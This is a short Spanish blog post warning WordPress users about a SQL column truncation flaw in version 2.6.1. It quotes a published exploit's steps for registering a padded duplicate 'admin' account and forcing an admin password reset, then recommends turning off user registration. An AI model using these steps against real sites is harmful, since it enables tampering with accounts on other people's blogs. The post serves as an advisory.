Me he dado cuenta que la version de WordPress 2.6.1 es vulnerable a una SQL Column Truncation, en la pagina de Milw0rm la cual visito todos los dias se ha publicado un exploit para explotar esa vulnerabilidad. El exploit es muy sencillo y puede ser usado por cualquier scriptkiddie que no tenga experiencia en el campo de programacion y compilacion de programas (exploits).

Acontinuacion pondre como usar el exploit.

1. go to url: server.com/wp-login.php?action=register

2. register as:

login: admin x
email: your email

^ admin[55 space chars]x

now, we have duplicated ‘admin’ account in database

3. go to url: server.com/wp-login.php?action=lostpassword

4. write your email into field and submit this form

5. check your email and go to reset confirmation link

6. admin’s password changed, but new password will be send to correct admin email ;/

Puede evitar que el exploit afecte tu web deshabilitando la opcion de registro de usuarios si lo tienes activado, si no lo tienes activado no tienes porque preocuparte ya que no seras afectado.

El exploit puedes encontrarlo aqui WordPress 2.6.1 SQL Column Truncation Vulnerability

A todos mis lectores que tengan WordPress y tengan activado el registro de usuarios en sus blogs se les recomienda desactivarlo, el exploit no lo he probado pero lo hare para ver que tan efectivo es.